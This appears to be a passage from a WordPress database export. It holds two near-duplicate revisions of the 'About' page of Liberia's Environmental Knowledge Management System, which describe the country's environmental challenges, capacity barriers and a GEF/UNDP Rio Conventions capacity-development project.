(Republic of Liberia, 2004), and deforestation rates have increased since 2000. Increases in deforestation and land degradation are largely due to displaced people clearing land. Also contributing to deforestation, biodiversity loss, and land degradation is unsustainable farming practices, mining, charcoal production, invasive species, hunting, and unregulated timber extraction. Poaching is also rampant and mitigation measures are lacking; the draft Wildlife Management and Protected Areas Act remains in draft form (Dorliae, 2012).</p>\n<p>Climate change also poses a real threat to Liberia. Among other threats, Liberia’s economy and human health could be threatened by rising temperatures and water scarcity. Currently, the country does not have strong capacities for mitigation and adaptation; Liberia has no institutions that offer climate change education or research programs (although, the University of Liberia does offer programs on the environment). Additionally, there are no organized or coordinated programs for meteorological, hydrological, or climate research and observation. Currently, only fragmented services are available. Along with a lack of observation networks, government bodies are hindered by inadequately-trained staff (Environmental Protection Agency of Liberia, 2013).</p>\n<p>Although aware of the environmental situation, Liberia has struggled to address these environmental issues. The civil wars, which lasted for more than 10 years, served to exacerbate the situation. Poverty also presents a serious challenge; causing degradation and drawing attention and resources from environmental concerns. Over 60% of Liberians live in poverty. Of these, over 40% of citizens live in extreme poverty (Dorliae, 2012). The outbreak of Ebola in 2014 also threatened Liberia’s progress, as the crisis became a priority for the government and stretched already limited resources. Fortunately in January 2016 the outbreak was declared resolved. Overall, there has been slow progress in sustainable development and meeting obligations under the Rio Conventions.</p>\n<h4>Root Causes</h4>\n<p>There are a few key root causes of environmental degradation in Liberia. The most critical include: human settlements and population pressures; shifting cultivation; timber exploitation; and rubber plantations. More generally, root causes are related to over-exploitation of biological resources; poverty; political instability and wars; education; and inadequate law enforcement (Republic of Liberia, 2004). From a reporting perspective, one root cause of Liberia’s development challenges is the fact that Focal Points are located in different agencies, which thereby limits coordination and collaboration between them.</p>\n<h4>A2. Capacity Barriers</h4>\n<p>Liberia has undertaken numerous initiatives to address environmental issues. Despite the achievements Liberia made, Liberia continues to face important challenges to meeting environmental goals. As a Rio Convention mainstreaming project, the proposed strategy sets out to meet barriers identified in Liberia’s 2006 National Capacity Self-Assessment (NCSA), which was undertaken though a consultative process and participatory approach that involved numerous stakeholders from various sectors. Through the inclusive and consultative process of the NCSA, stakeholders identified a number of areas that explain the difficulty in fulfilling the obligations of the Rio Conventions. The NCSA identified the following barriers that cut across the three Rio Conventions:</p>\n<ul>\n<li style=\"list-style-type: none;\">\n<ul>\n<li style=\"list-style-type: none;\">\n<ul>\n<li>Inadequate public awareness and education/training</li>\n<li>Inadequate institutions and institutional frameworks</li>\n<li>Inadequate political commitment</li>\n<li>Inadequate planning skills and resources, as well as incomplete structures at all levels of policy implementation</li>\n<li>Inadequate financial resources and economic framework</li>\n<li>Inadequate strategic plans and implementation</li>\n<li>Inadequate access to information</li>\n<li>Inadequate policies and legal frameworks</li>\n<li>Low level of involvement of civil society</li>\n<li>Inadequate natural resources management systems</li>\n<li>Lack of institutional capacities</li>\n<li>Lack of effective mechanism for information processing and sharing</li>\n<li>\n<p>Poor governance</p>\n</li>\n</ul>\n</li>\n</ul>\n</li>\n</ul>\n<p>Liberia’s Agenda for Transformation 2012-2017 confirmed many of the barriers identified in the NCSA. Specifically, the agenda noted the following barriers:</p>\n<ul>\n<li>Weak technical, administrative and managerial capacities;</li>\n<li>Weak institutional coordination;</li>\n<li>Unclear policies and mechanisms to enable effective participation by especially non-state actors; at the national and local levels;</li>\n<li>Limited stakeholder participation in planning and decision-making processes;</li>\n<li>Limited dissemination of key information (Republic of Liberia, 2013).</li>\n</ul>\n<p>Barriers were also reaffirmed in the Liberia Constraints Analysis (Government of Liberia, 2013).</p>\n<h4>A.3 Consistency with National Priorities</h4>\n<p>The country has demonstrated a desire to improve the environmental policy framework with the preparation of multiple new policies including the National Environmental Protection and Management Law (2003), the National Environmental Policy (2003), the establishment of an Environmental Protection Agency, in 2003, the National Forestry Law (2000), and the New Mineral and Mining Laws (2000).</p>\n<p>In the first Poverty Reduction Strategy, the environment was considered a cross-cutting issue. Some achievements made during implementation of this strategy include passage of the Community Rights Law, which established a system for community harvesting of forests. Efforts were also undertaken to improve protected areas management and increase the size/number of protected areas. In Liberia’s medium-term Poverty Reduction Strategy II (2012-2018) there is a fifth pillar: Cross-Cutting Issues which includes the environment. Additionally, environmental issues have been integrated into other pillars of the strategy specifically the economic pillar.</p>\n<p>During the Liberia Rio +20 National Consultative Workshop, Liberia identified five issues that are essential for accomplishing its development goals and objectives. Additionally, Liberia has also developed a National Capacity Development Strategy (2010), which calls for investing in areas needed to achieve development goals.</p>\n<p>The project will assist the Government of Liberia to achieve the national priorities it has set in Liberia RISING 2030. The aim of this is to transform Liberia through a new development strategy, which was launched in December 2012. The overall objective is to turn Liberia into a middle income country by 2030.</p>\n<p>The project is also in line with Liberia’s National Biodiversity Strategy and Action Plan II (NBSAP) which aims to, as part of Liberia’s commitment to the Millennium Development Goals, and in line with the National Environmental Policy of Liberia, assist the people of Liberia to acknowledge and exercise responsible stewardship over biological resources to meet the needs of the present without endangering the ability of future generations to meet their own needs. Some of the goals are to protect critical ecosystems, create biodiversity awareness, and increase commitment to sustainable use of biological diversity (Republic of Liberia, 2017).</p>\n<p>Liberia’s 2008 National Adaptation Plan of Action (NAPA), as a response to the impacts of climate change, aligns with National Environmental Policy which calls for the sustainable management of Liberia’s environment and natural resources. The NAPA also aims to establish synergies between adaptation and national development plans, such as the National Reconstruction and Development Plan, Millennium Development Goals, and the National Biodiversity and Strategy Action Plan. The NAPA identifies key adaptation needs and list priority actions, such as enhancing resilience to increasing rainfall variability through agriculture, to address the needs.</p>\n<p>This project is also in line with Liberia’s UNDAF 2013-2017. The UN Country Team decided that the new UNDAF would also take into account the requirements of Delivering as One. Thus, in addition to the Strategic Framework and Results Matrix, the UNDAF is accompanied by a detailed Costed Action Plan. Together they constitute the One Programme. The four pillars of the One UN Programme are:</p>\n<ul>\n<li>Peace, Security, Rule of Law</li>\n<li>Sustainable Economic Transformation</li>\n<li>Human Development</li>\n<li>Inclusive Governance and Public Institutions</li>\n</ul>\n<p>The UNDAF (One Programme) also aligns with Liberia’s National medium-term strategy, known as the Agenda for Transformation. The Agenda for Transformation is based on five pillars:</p>\n<ul>\n<li>Peace, Security and Rule of Law</li>\n<li>Economic Transformation</li>\n<li>Human Development</li>\n<li>Governance and Public Institutions</li>\n<li>Cross-cutting issues</li>\n</ul>\n<p>The Agenda contains a specific goal to improve management of the environment to safeguard sustained economic development and growth. Specific actions called for in this agenda include: a) developing environmental quality standards and regulatory tools; b) harmonizing environmental laws and policies to ensure improved environmental management; c) undertake a gap analysis of sectoral environmental laws and policies; d) create environmental awareness; e) create training and education programmes; f) develop a public awareness strategy and campaign; g) train professionals in effective environmental management; strengthen environmental units in ministries through training and improved coordination; and h) develop a system to collect and disseminate environmental information/data.</p>\n<p>The design and implementation of the proposed CCCD project would also take into account the development plans of other bilateral and multilateral donors in Liberia to ensure appropriate alignment as well as to leverage the necessary co-financing.</p>\n<h4>A.4 Baseline Scenario and Associated Baseline Projects</h4>\n<p>Liberia is struggling to fulfill many of the objectives set forth in the Rio Conventions. Many of the developed frameworks and plans for action face limited implementation due to limited government resources, limited human capacity, and a lack of appropriate technologies. Liberia struggles with an inadequate system for information and knowledge management and the poor information sharing between or within sectors. Additionally, the country’s degraded and limited infrastructure combined with a low technical and institutional capacity severely limit Liberia’s environmental governance framework and thus its potential to conserve the natural environment, let alone secure long-term benefits from it. The civil war only exacerbated the situation, leading to displacement of individuals and unprecedented amounts of resource exploitation. Although Liberia is recovering from the war, 85% of the population still lives below the international poverty line. Liberia’s HDI (2014) is 0.430, ranking the country 177 out of 188 (UNDP, 2015).&nbsp;</p>\n<p>Multilateral donor agencies specifically in the field of natural resource management currently working in Liberia now include the African Development Bank, GEF, IFAD, UNDP, and the World Bank. Bilateral donor agencies are also very important development partners from, Norway, and the United States (USAID), as well as other inter-governmental organizations such as the CARE International, Conservation International, and the Society for the Conservation of Nature in Liberia.&nbsp;</p>\n<p>National environmental NGOs, with assistance from Conservation International, organized themselves into the Alliance for Conservation in Liberia. The goal of this body is to ensure that all local NGOs who are or would like to be involved in conservation of biodiversity can do so without overlapping efforts or functions.&nbsp;</p>\n<p>Liberia has made significant progress since the end of the civil war by investing in infrastructure, revising existing policies and laws, and reviewing the mandates of political institutions to reduce duplication. One area of progress is updating the mandates and restructuring Government ministries and agencies to improve effectiveness and efficiency. Liberia has also established new agencies like the Rural and Renewable Energy Agency to promote the sustainable development strategy. Reforms in Liberia have been undertaken on an institution-by-institution basis and have not been considered on a holistic basis, nor have they increased coordination and harmonization.&nbsp;</p>\n<p>Between 2010 and 2012, UNEP implemented a global project, entitled Piloting Integrated Processes and Approaches to Facilitate National Reporting to Rio Conventions that included Liberia as a beneficiary country. This project focused on helping Liberia (among other countries) to better organize modalities for accessing and preparing their national reports. Notwithstanding the capacities developed, a number of important capacities remained to be developed, such as the standardization of data collection and information analysis, improved coordination and collaboration to facilitate streamlined national reporting, and increased awareness and stakeholder engagement in the national reporting process. During the project implementation, activities under component 4 will undertake an updated assessment of the systemic, institutional, and individual capacities that remain a priority to be developed in order to meet and sustain Rio Convention obligations.</p>\n<p>A description of on-going projects that this project will coordinate with appears in section C.4 Partnerships. Relevant completed UNDP GEF projects that form the baseline of this project include:</p>\n<h4>Associated Baseline Projects</h4>\n<table style=\"width: 100%;\">\n<tbody>\n<tr>\n<th><strong>Project Name</strong></th>\n<th><strong>Description of project’s alignment with CCCD project</strong></th>\n</tr>\n<tr>\n<td>GEF Enhancing Resilience to Climate Change by Mainstreaming Adaption Concerns into Agricultural Sector Development in Liberia (Ending September 2015)</td>\n<td>The expected results of this project included improving the rural communities’ capacities, increasing sustainable livestock and crop production, and reducing poverty.</td>\n</tr>\n<tr>\n<td>FAO to Support MOA Statistics and Information Management System</td>\n<td>The objective of this project was to support the implementation of a linked information and knowledge system.</td>\n</tr>\n<tr>\n<td>Smallholder Agricultural Productivity Enhancement and Commercialization Project (SAPEC)</td>\n<td>The goal this project was to reduce rural poverty and household food insecurity. One component is capacity building and institutional strengthening, which includes trainings.</td>\n</tr>\n</tbody>\n</table>\n<h3>B. Strategy</h3>\n<h4>B.1 Alternative Strategies</h4>\n<p>During the conceptualization of the present cross-cutting capacity development project, a number of alternative approaches were considered, taking into account the current set of interventions currently underway and planned for Liberia. An important starting point was the findings and recommendations of the National Capacity Self-Assessment, followed by a consideration of the lessons learned from other projects, such as a review of the Final Evaluation of the Mainstreaming and Capacity Building for Sustainable Land Management project . A review of the recommendations contained in the more recent Rio Convention reports was also considered, such as the 2016 National Biodiversity Strategy and Action Plan.</p>\n<p>The single most common cross-cutting capacity development constraint that was recurring in the various assessments and action plans was the significantly low institutional capacity for managing data and information for improved planning and decision-making to meet and sustain Rio Convention obligations. Taking into account the GEF-6 Cross-Cutting Capacity Development priority of strengthening mainstreaming capacities as a strategy to meet the duality of national development and global environmental priorities, this project’s objective was formulated.</p>\n<p>From an implementation perspective, a number of alternative approaches were considered to meet the stated objective. One was for Liberia to continue the same approach of implementing focal area projects, and to strengthen the key set of systemic, institutional, and individual capacities through focal area projects. However, this approach will not address the capacity development gaps nor result in creating synergies. Another aspect considered was to have different components executed by different agencies. The challenge with this approach is the relative weak coordination among government ministries and agencies – indeed an important capacity development need that the project would help address. A related issue was the government’s keen desire to use the project to strengthen national capacity of the Environmental Protection Agency.</p>\n<p>The selected strategy was based on the real need to strengthen meaningful capacities that can be successfully institutionalized. The key here is not for the project to take on more than the Environmental Protection Agency can absorb, but rather, through the process of project execution, learn how to formulate better plans and make better decisions regarding the global environment within the framework of their institutional mandates. That is, this project places a premium on address institutional sustainability by emphasizing the execution of the project through a wide range of learning-by-doing exercises by the EPA. This will require that they reach out of other government ministries and agencies to meet complementary and shared mandates as well as to effectively negotiate resolution of real or perceived conflicts of interests that come about through Rio Convention mainstreaming.</p>\n<h4>B.2 Selected Scenario</h4>\n<p>This project is in line with the GEF-6 CCCD Strategy objective 1, 3, and 5 which call for countries to: a) integrate global environmental needs into management information systems and monitoring, b) integrate MEA provisions into national policy, legislative, and regulatory frameworks, and c) update NCSAs, respectively.</p>\n<p style=\"background-color: lightgray;\">The uniqueness of this project is centered on its cross-cutting nature. Other projects currently under implementation focus on strengthening targeted capacities under one of the three Rio Conventions, and thus have a relatively narrower system boundary than the CCCD programme approach. In the absence of the CCCD project, there remains likelihood that Liberia would not realize its full potential for sustainable development due to limited coordination and decentralization. Additionally, it is likely that environmental management in Liberia would continue to focus on traditionally narrow constructs.</p>\n<h4>B.3 Knowledge Management</h4>\n<p>This project is part of a portfolio of capacity building interventions in Liberia that encourages regional cooperation and knowledge and information exchanges. Partnerships and collaboration will also catalyze the transfer of knowledge and competencies among actors and stakeholders. Lessons learned from other projects will be included, as appropriate (for example, in the training programmes and the knowledge management system). This project also contains specific activities to increase the use and sharing of knowledge, and to strengthen critical thinking in understanding the implications of the global environment towards the pursuit of sustainable development. These include a series of learning-by-doing workshops and public dialogues among a diverse set of stakeholders. Component one focuses on establishing a system for collecting and sharing information and data between the institutions for better environmental management and the fulfillment of the obligations of the Rio Conventions (an EKMS).</p>\n<p>The system that the project will strengthen is the ideal platform to share lessons learned and experiences with the main stakeholders of environmental information and knowledge. Universities and research centers will be at the center of the information and knowledge management and will ensure the integration of innovative scientific and technical information into the project setup and into other baseline initiatives.</p>\n<p>The project’s approach to knowledge management is consistent with the International Resource Panel Report on Policy Coherence of the Sustainable Development Goals which emphasizes the need for developing widespread awareness and creating and disseminating decision support tools.</p>\n<h2>What does the EKMS include?</h2>\n\n<!-- wp:paragraph -->\n<p>The Environmental Knowledge Management System (EKMS) is an integrated online knowledge platform which strive to draw on and complement a growing agenda on the Rio Conventions within the Natural Resource Management Sector and external partners to scale up environmental initiatives.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The EKMS provides free and open access to information from key government and other institutions in Liberia relating to the implementation of the Rio Conventions – The United Nations Framework Convention on Climate Change, The United Nations Convention to Combat Desertification, and The United Nations Convention on Biological Diversity. The EKMS is deployed under the supervision of Environmental Protection Agency (EPA) in collaboration with twelve relevant government institutions. Information access on this platform include reports, publications, case studies, tools and guidelines, institution’s technical documents, and other related materials.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Additionally, the EKMS provides a platform for government institutions and other contributors to share latest blogs, news and stories related to the Rio Conventions implementation process.</p>\n<!-- /wp:paragraph -->\n\n<h2>Acknowledgement</h2>\n<p>The EPA gratefully acknowledges financial support from the Global Environmental Facility (GEF), through the United Nations Development Programme (UNDP), for the development of this Environmental Knowledge Management System (EKMS).</p>\n<h2>Disclaimer</h2>\n<p>The Environmental Knowledge Management System (EKMS) provides free and open access to important information from key government and partner institutions in Liberia on implementation of the Rio Conventions. The information in the EKMS is provided for informational and educational purposes only. This website contents can not be taken to reflect the views of its sponsors.</p>','About','','inherit','closed','closed','','68-revision-v1','','','2021-08-17 11:04:23','2021-08-17 11:04:23','',68,'https://ekmsliberia.info/?p=3830',0,'revision','',0),(3831,38,'2021-08-17 11:04:23','2021-08-17 11:04:23','<h2>About the EKMS</h2>		\n			<h2>Why was the EKMS created?</h2>		\n		<p>In an effort to bridge knowledge management gaps, the EKMS was created to strengthen institutional coordination between the Environmental Protection Agency (EPA) and Partner governmental institutions as well as non-governmental organizations that have direct linkages with environmental policies and development. It was also created to increase access and dissemination of key information and promote adequate public awareness and education.</p>\n<p>The EKMS is an output of the Cross-Cutting Capacity Development Project (CCCD). The project funded by the GEF and implemented by the EPA in partnership with the UNDP in collaboration with Natural Resources Management Agencies of Liberia. The project is in line with GEF-6 CCCD Strategy objective 1, 3, and 5 which call for countries to: a) integrate global environmental needs into management information systems and monitoring, b) integrate MEA provisions into national policy, legislative, and regulatory frameworks, and c) update NCSAs, respectively.</p>\n<h3>Development Challenge</h3>\n<h4>A1. Global Environmental Challenges</h4>\n<p>Liberia is located on the southwest coast of Africa, and boarders the Ivory Coast, Guinea, and Sierra Leone. Liberia is divided into 15 counties, which are subdivided into 90 districts. Although Liberia is a rather small country, it has significant biodiversity. There are 600 bird species, 150 mammals, 75 reptiles and over 2000 flowering plants. Some notable species in Liberia include western chimpanzees, forest elephants, and leopards. Liberia also has rich forests; around 42% of the Upper Guinea Forest of West Africa is contained within Liberia (Republic of Liberia, 2014; Republic of Liberia, 2004). Liberia also has numerous natural resources such as timber, rubber, gold diamonds, and iron ore. Economically, the forestry and agriculture sectors are two of the most important sectors in Liberia. Agriculture accounts for over 70% of livelihoods (Dorliae, 2012).</p>\n<p>Liberia faces numerous environmental challenges including land degradation, fragmentation, deforestation, soil erosion, and pollution. The dependence on forestry presents a unique environmental risk as Liberia’s forest is part of the West African Hotspot. This (once) rich ecosystem has faced severe deforestation; only ten percent of the original forest remains, of which around 40% lies in Liberia. Unfortunately, this remaining forest is at risk serious risk of deforestation. Over the past two centuries, Liberia has lost over 60% of its forest cover (Republic of Liberia, 2004), and deforestation rates have increased since 2000. Increases in deforestation and land degradation are largely due to displaced people clearing land. Also contributing to deforestation, biodiversity loss, and land degradation is unsustainable farming practices, mining, charcoal production, invasive species, hunting, and unregulated timber extraction. Poaching is also rampant and mitigation measures are lacking; the draft Wildlife Management and Protected Areas Act remains in draft form (Dorliae, 2012).</p>\n<p>Climate change also poses a real threat to Liberia. Among other threats, Liberia’s economy and human health could be threatened by rising temperatures and water scarcity. Currently, the country does not have strong capacities for mitigation and adaptation; Liberia has no institutions that offer climate change education or research programs (although, the University of Liberia does offer programs on the environment). Additionally, there are no organized or coordinated programs for meteorological, hydrological, or climate research and observation. Currently, only fragmented services are available. Along with a lack of observation networks, government bodies are hindered by inadequately-trained staff (Environmental Protection Agency of Liberia, 2013).</p>\n<p>Although aware of the environmental situation, Liberia has struggled to address these environmental issues. The civil wars, which lasted for more than 10 years, served to exacerbate the situation. Poverty also presents a serious challenge; causing degradation and drawing attention and resources from environmental concerns. Over 60% of Liberians live in poverty. Of these, over 40% of citizens live in extreme poverty (Dorliae, 2012). The outbreak of Ebola in 2014 also threatened Liberia’s progress, as the crisis became a priority for the government and stretched already limited resources. Fortunately in January 2016 the outbreak was declared resolved. Overall, there has been slow progress in sustainable development and meeting obligations under the Rio Conventions.</p>\n<h4>Root Causes</h4>\n<p>There are a few key root causes of environmental degradation in Liberia. The most critical include: human settlements and population pressures; shifting cultivation; timber exploitation; and rubber plantations. More generally, root causes are related to over-exploitation of biological resources; poverty; political instability and wars; education; and inadequate law enforcement (Republic of Liberia, 2004). From a reporting perspective, one root cause of Liberia’s development challenges is the fact that Focal Points are located in different agencies, which thereby limits coordination and collaboration between them.</p>\n<h4>A2. Capacity Barriers</h4>\n<p>Liberia has undertaken numerous initiatives to address environmental issues. Despite the achievements Liberia made, Liberia continues to face important challenges to meeting environmental goals. As a Rio Convention mainstreaming project, the proposed strategy sets out to meet barriers identified in Liberia’s 2006 National Capacity Self-Assessment (NCSA), which was undertaken though a consultative process and participatory approach that involved numerous stakeholders from various sectors. Through the inclusive and consultative process of the NCSA, stakeholders identified a number of areas that explain the difficulty in fulfilling the obligations of the Rio Conventions. The NCSA identified the following barriers that cut across the three Rio Conventions:</p>\n<ul>\n<li style=\"list-style-type: none;\">\n<ul>\n<li style=\"list-style-type: none;\">\n<ul>\n<li>Inadequate public awareness and education/training</li>\n<li>Inadequate institutions and institutional frameworks</li>\n<li>Inadequate political commitment</li>\n<li>Inadequate planning skills and resources, as well as incomplete structures at all levels of policy implementation</li>\n<li>Inadequate financial resources and economic framework</li>\n<li>Inadequate strategic plans and implementation</li>\n<li>Inadequate access to information</li>\n<li>Inadequate policies and legal frameworks</li>\n<li>Low level of involvement of civil society</li>\n<li>Inadequate natural resources management systems</li>\n<li>Lack of institutional capacities</li>\n<li>Lack of effective mechanism for information processing and sharing</li>\n<li>\n<p>Poor governance</p>\n</li>\n</ul>\n</li>\n</ul>\n</li>\n</ul><p>Liberia’s Agenda for Transformation 2012-2017 confirmed many of the barriers identified in the NCSA. Specifically, the agenda noted the following barriers:</p>\n<ul>\n<li>Weak technical, administrative and managerial capacities;</li>\n<li>Weak institutional coordination;</li>\n<li>Unclear policies and mechanisms to enable effective participation by especially non-state actors; at the national and local levels;</li>\n<li>Limited stakeholder participation in planning and decision-making processes;</li>\n<li>Limited dissemination of key information (Republic of Liberia, 2013).</li>\n</ul>\n<p>Barriers were also reaffirmed in the Liberia Constraints Analysis (Government of Liberia, 2013).</p>\n<h4>A.3 Consistency with National Priorities</h4>\n<p>The country has demonstrated a desire to improve the environmental policy framework with the preparation of multiple new policies including the National Environmental Protection and Management Law (2003), the National Environmental Policy (2003), the establishment of an Environmental Protection Agency, in 2003, the National Forestry Law (2000), and the New Mineral and Mining Laws (2000).</p>\n<p>In the first Poverty Reduction Strategy, the environment was considered a cross-cutting issue. Some achievements made during implementation of this strategy include passage of the Community Rights Law, which established a system for community harvesting of forests. Efforts were also undertaken to improve protected areas management and increase the size/number of protected areas. In Liberia’s medium-term Poverty Reduction Strategy II (2012-2018) there is a fifth pillar: Cross-Cutting Issues which includes the environment. Additionally, environmental issues have been integrated into other pillars of the strategy specifically the economic pillar.</p>\n<p>During the Liberia Rio +20 National Consultative Workshop, Liberia identified five issues that are essential for accomplishing its development goals and objectives. Additionally, Liberia has also developed a National Capacity Development Strategy (2010), which calls for investing in areas needed to achieve development goals.</p>\n<p>The project will assist the Government of Liberia to achieve the national priorities it has set in Liberia RISING 2030. The aim of this is to transform Liberia through a new development strategy, which was launched in December 2012. The overall objective is to turn Liberia into a middle income country by 2030.</p>\n<p>The project is also in line with Liberia’s National Biodiversity Strategy and Action Plan II (NBSAP) which aims to, as part of Liberia’s commitment to the Millennium Development Goals, and in line with the National Environmental Policy of Liberia, assist the people of Liberia to acknowledge and exercise responsible stewardship over biological resources to meet the needs of the present without endangering the ability of future generations to meet their own needs. Some of the goals are to protect critical ecosystems, create biodiversity awareness, and increase commitment to sustainable use of biological diversity (Republic of Liberia, 2017).</p>\n<p>Liberia’s 2008 National Adaptation Plan of Action (NAPA), as a response to the impacts of climate change, aligns with National Environmental Policy which calls for the sustainable management of Liberia’s environment and natural resources. The NAPA also aims to establish synergies between adaptation and national development plans, such as the National Reconstruction and Development Plan, Millennium Development Goals, and the National Biodiversity and Strategy Action Plan. The NAPA identifies key adaptation needs and list priority actions, such as enhancing resilience to increasing rainfall variability through agriculture, to address the needs.</p>\n<p>This project is also in line with Liberia’s UNDAF 2013-2017. The UN Country Team decided that the new UNDAF would also take into account the requirements of Delivering as One. Thus, in addition to the Strategic Framework and Results Matrix, the UNDAF is accompanied by a detailed Costed Action Plan. Together they constitute the One Programme. The four pillars of the One UN Programme are:</p>\n<ul>\n<li>Peace, Security, Rule of Law</li>\n<li>Sustainable Economic Transformation</li>\n<li>Human Development</li>\n<li>Inclusive Governance and Public Institutions</li>\n</ul>\n<p>The UNDAF (One Programme) also aligns with Liberia’s National medium-term strategy, known as the Agenda for Transformation. The Agenda for Transformation is based on five pillars:</p>\n<ul>\n<li>Peace, Security and Rule of Law</li>\n<li>Economic Transformation</li>\n<li>Human Development</li>\n<li>Governance and Public Institutions</li>\n<li>Cross-cutting issues</li>\n</ul>\n<p>The Agenda contains a specific goal to improve management of the environment to safeguard sustained economic development and growth. Specific actions called for in this agenda include: a) developing environmental quality standards and regulatory tools; b) harmonizing environmental laws and policies to ensure improved environmental management; c) undertake a gap analysis of sectoral environmental laws and policies; d) create environmental awareness; e) create training and education programmes; f) develop a public awareness strategy and campaign; g) train professionals in effective environmental management; strengthen environmental units in ministries through training and improved coordination; and h) develop a system to collect and disseminate environmental information/data.</p>\n<p>The design and implementation of the proposed CCCD project would also take into account the development plans of other bilateral and multilateral donors in Liberia to ensure appropriate alignment as well as to leverage the necessary co-financing.</p>\n<h4>A.4 Baseline Scenario and Associated Baseline Projects</h4>\n<p>Liberia is struggling to fulfill many of the objectives set forth in the Rio Conventions. Many of the developed frameworks and plans for action face limited implementation due to limited government resources, limited human capacity, and a lack of appropriate technologies. Liberia struggles with an inadequate system for information and knowledge management and the poor information sharing between or within sectors. Additionally, the country’s degraded and limited infrastructure combined with a low technical and institutional capacity severely limit Liberia’s environmental governance framework and thus its potential to conserve the natural environment, let alone secure long-term benefits from it. The civil war only exacerbated the situation, leading to displacement of individuals and unprecedented amounts of resource exploitation. Although Liberia is recovering from the war, 85% of the population still lives below the international poverty line. Liberia’s HDI (2014) is 0.430, ranking the country 177 out of 188 (UNDP, 2015). </p>\n<p>Multilateral donor agencies specifically in the field of natural resource management currently working in Liberia now include the African Development Bank, GEF, IFAD, UNDP, and the World Bank. Bilateral donor agencies are also very important development partners from, Norway, and the United States (USAID), as well as other inter-governmental organizations such as the CARE International, Conservation International, and the Society for the Conservation of Nature in Liberia. </p>\n<p>National environmental NGOs, with assistance from Conservation International, organized themselves into the Alliance for Conservation in Liberia. The goal of this body is to ensure that all local NGOs who are or would like to be involved in conservation of biodiversity can do so without overlapping efforts or functions. </p>\n<p>Liberia has made significant progress since the end of the civil war by investing in infrastructure, revising existing policies and laws, and reviewing the mandates of political institutions to reduce duplication. One area of progress is updating the mandates and restructuring Government ministries and agencies to improve effectiveness and efficiency. Liberia has also established new agencies like the Rural and Renewable Energy Agency to promote the sustainable development strategy. Reforms in Liberia have been undertaken on an institution-by-institution basis and have not been considered on a holistic basis, nor have they increased coordination and harmonization. </p>\n<p>Between 2010 and 2012, UNEP implemented a global project, entitled Piloting Integrated Processes and Approaches to Facilitate National Reporting to Rio Conventions that included Liberia as a beneficiary country. This project focused on helping Liberia (among other countries) to better organize modalities for accessing and preparing their national reports. Notwithstanding the capacities developed, a number of important capacities remained to be developed, such as the standardization of data collection and information analysis, improved coordination and collaboration to facilitate streamlined national reporting, and increased awareness and stakeholder engagement in the national reporting process. During the project implementation, activities under component 4 will undertake an updated assessment of the systemic, institutional, and individual capacities that remain a priority to be developed in order to meet and sustain Rio Convention obligations.</p>\n<p>A description of on-going projects that this project will coordinate with appears in section C.4 Partnerships. Relevant completed UNDP GEF projects that form the baseline of this project include:</p>\n<h4>Associated Baseline Projects</h4>\n<table style=\"width: 100%;\">\n<tbody>\n<tr>\n<th><strong>Project Name</strong></th>\n<th><strong>Description of project’s alignment with CCCD project</strong></th>\n</tr>\n<tr>\n<td>GEF Enhancing Resilience to Climate Change by Mainstreaming Adaption Concerns into Agricultural Sector Development in Liberia (Ending September 2015)</td>\n<td>The expected results of this project included improving the rural communities’ capacities, increasing sustainable livestock and crop production, and reducing poverty.</td>\n</tr>\n<tr>\n<td>FAO to Support MOA Statistics and Information Management System</td>\n<td>The objective of this project was to support the implementation of a linked information and knowledge system.</td>\n</tr>\n<tr>\n<td>Smallholder Agricultural Productivity Enhancement and Commercialization Project (SAPEC)</td>\n<td>The goal this project was to reduce rural poverty and household food insecurity. One component is capacity building and institutional strengthening, which includes trainings.</td>\n</tr>\n</tbody>\n</table>\n<h3>B. Strategy</h3>\n<h4>B.1 Alternative Strategies</h4>\n<p>During the conceptualization of the present cross-cutting capacity development project, a number of alternative approaches were considered, taking into account the current set of interventions currently underway and planned for Liberia. An important starting point was the findings and recommendations of the National Capacity Self-Assessment, followed by a consideration of the lessons learned from other projects, such as a review of the Final Evaluation of the Mainstreaming and Capacity Building for Sustainable Land Management project . A review of the recommendations contained in the more recent Rio Convention reports was also considered, such as the 2016 National Biodiversity Strategy and Action Plan.</p>\n<p>The single most common cross-cutting capacity development constraint that was recurring in the various assessments and action plans was the significantly low institutional capacity for managing data and information for improved planning and decision-making to meet and sustain Rio Convention obligations. Taking into account the GEF-6 Cross-Cutting Capacity Development priority of strengthening mainstreaming capacities as a strategy to meet the duality of national development and global environmental priorities, this project’s objective was formulated.</p>\n<p>From an implementation perspective, a number of alternative approaches were considered to meet the stated objective. One was for Liberia to continue the same approach of implementing focal area projects, and to strengthen the key set of systemic, institutional, and individual capacities through focal area projects. However, this approach will not address the capacity development gaps nor result in creating synergies. Another aspect considered was to have different components executed by different agencies. The challenge with this approach is the relative weak coordination among government ministries and agencies – indeed an important capacity development need that the project would help address. A related issue was the government’s keen desire to use the project to strengthen national capacity of the Environmental Protection Agency.</p>\n<p>The selected strategy was based on the real need to strengthen meaningful capacities that can be successfully institutionalized. The key here is not for the project to take on more than the Environmental Protection Agency can absorb, but rather, through the process of project execution, learn how to formulate better plans and make better decisions regarding the global environment within the framework of their institutional mandates. That is, this project places a premium on address institutional sustainability by emphasizing the execution of the project through a wide range of learning-by-doing exercises by the EPA. This will require that they reach out of other government ministries and agencies to meet complementary and shared mandates as well as to effectively negotiate resolution of real or perceived conflicts of interests that come about through Rio Convention mainstreaming.</p>\n<h4>B.2 Selected Scenario</h4>\n<p>This project is in line with the GEF-6 CCCD Strategy objective 1, 3, and 5 which call for countries to: a) integrate global environmental needs into management information systems and monitoring, b) integrate MEA provisions into national policy, legislative, and regulatory frameworks, and c) update NCSAs, respectively.</p>\n<p style=\"background-color: lightgray;\">The uniqueness of this project is centered on its cross-cutting nature. Other projects currently under implementation focus on strengthening targeted capacities under one of the three Rio Conventions, and thus have a relatively narrower system boundary than the CCCD programme approach. In the absence of the CCCD project, there remains likelihood that Liberia would not realize its full potential for sustainable development due to limited coordination and decentralization. Additionally, it is likely that environmental management in Liberia would continue to focus on traditionally narrow constructs.</p>\n<h4>B.3 Knowledge Management</h4>\n<p>This project is part of a portfolio of capacity building interventions in Liberia that encourages regional cooperation and knowledge and information exchanges. Partnerships and collaboration will also catalyze the transfer of knowledge and competencies among actors and stakeholders. Lessons learned from other projects will be included, as appropriate (for example, in the training programmes and the knowledge management system). This project also contains specific activities to increase the use and sharing of knowledge, and to strengthen critical thinking in understanding the implications of the global environment towards the pursuit of sustainable development. These include a series of learning-by-doing workshops and public dialogues among a diverse set of stakeholders. Component one focuses on establishing a system for collecting and 